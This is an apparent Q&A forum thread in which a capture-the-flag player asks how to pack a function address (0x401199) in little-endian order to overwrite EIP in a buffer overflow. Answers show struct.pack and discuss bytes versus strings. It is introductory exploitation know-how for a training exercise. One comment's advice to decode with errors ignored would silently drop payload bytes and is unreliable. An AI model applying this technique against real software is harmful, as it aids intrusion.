0

i have been doin ctf challenge and came across a problem when i have to push the address of a function into eip{instruction pointer} by overflowing the buffer but the main problem here is that the address of the function is 0x401199 and in other to push the address i have to push it in reverse order like \x99\x11\x40\x00 and i have been using python to do so , but the main problem here is that some the these value like \x99 and \x11 are associated with non printable character and i cannot guess any other method to do so please some one with time can clear my request

i hope i explained my query briefly

Improve this question
0

1 Answer 1

Reset to default
1

You're describing encoding a Python int into bytes. In this case, the int is a 32-bit unsigned integer.

Use struct.pack for this:

>>> struct.pack("<I", 0x401199)
b'\x99\x11@\x00'
  • < means little endian (=smallest byte goes first)
  • I means unsigned int (=32-bit on most desktop platforms)

For the reasons you've describing, these bytes cannot generally be converted into a string: b'\x99\x11@\x00' is not a valid utf-8 encoding.

For converting bytes into strings, use the binascii module (+.encode to convert bytes into a Python string)

For example:

>> binascii.b2a_hex(b'\x99\x11@\x00').decode()
'99114000'
Improve this answer
3
  • thanks for the help but didnot work! i added struck.pack but now python return bytes not str when use struct,pack but cannot concatenate with the padding i am trying to
    – Zishan Ansari
    Commented Mar 16 at 20:45
  • The python str type is for readable text, byte is for binary data. Your payload needs to meet certain specifications such as having a specific byte length, having some data at specific offset.
    – maarten
    Commented Mar 17 at 3:07
  • That said, you can convert a byte string to text, and ignore errors by doing: b"\x99\x11@\x00".decode(errors="ignore")
    – maarten
    Commented Mar 17 at 3:07

Not the answer you're looking for? Browse other questions tagged or ask your own question.